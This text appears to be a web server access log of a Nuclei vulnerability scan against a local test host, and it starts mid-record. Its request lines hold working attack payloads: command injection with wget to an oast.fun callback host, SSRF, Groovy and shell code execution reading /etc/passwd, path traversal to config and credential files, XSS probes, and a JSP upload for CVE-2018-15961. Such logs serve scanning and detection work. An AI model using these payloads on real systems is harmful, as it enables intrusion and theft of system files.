HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x0D\x0A \x22name\x22: \x22test\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /website/blog/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22objs\x22: [{\x22FID\x22: \x22init\x22}], \x22SID\x22: \x22|wget http://ca285tosmpvbafqg07h087hxkhxdq7oor.oast.fun|\x22, \x22browser\x22: \x22gecko_linux\x22, \x22backend_version\x22: -1, \x22loc\x22: \x22\x22, \x22_cookie\x22: null, \x22wdebug\x22: 0, \x22RID\x22: \x221629210675639_0.5000855117488202\x22, \x22current_uuid\x22: \x22\x22, \x22ipv6\x22: true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /var HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"action=test&configuration=O:10:\x22PMA_Config\x22:1:{s:6:\x22source\x22,s:11:\x22/etc/passwd\x22;}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scripts/setup.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../conf/config.properties HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/media/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"username=airflow&password=airflow&_csrf_token={{csrf_token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=nuclei%25{128*128} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22lang\x22:\x22groovy\x22,\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getText()\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://ca285tosmpvbafqg07h0qc163ri33kds9.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actions/authenticate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"action=health-check-view-file-diff&file=../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"alibaba.interact.sh","request":"GET http://alibaba.interact.sh/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/login/?next=/admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229KAY3x6E2yDpdFXSXd5aZNr9dB.jsp\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-15961\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A29KAY3x6E2yDpdFXSXd5aZNr9dB.jsp\x0D\x0A-----------------------------24464570528145--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /super/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/whoami HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 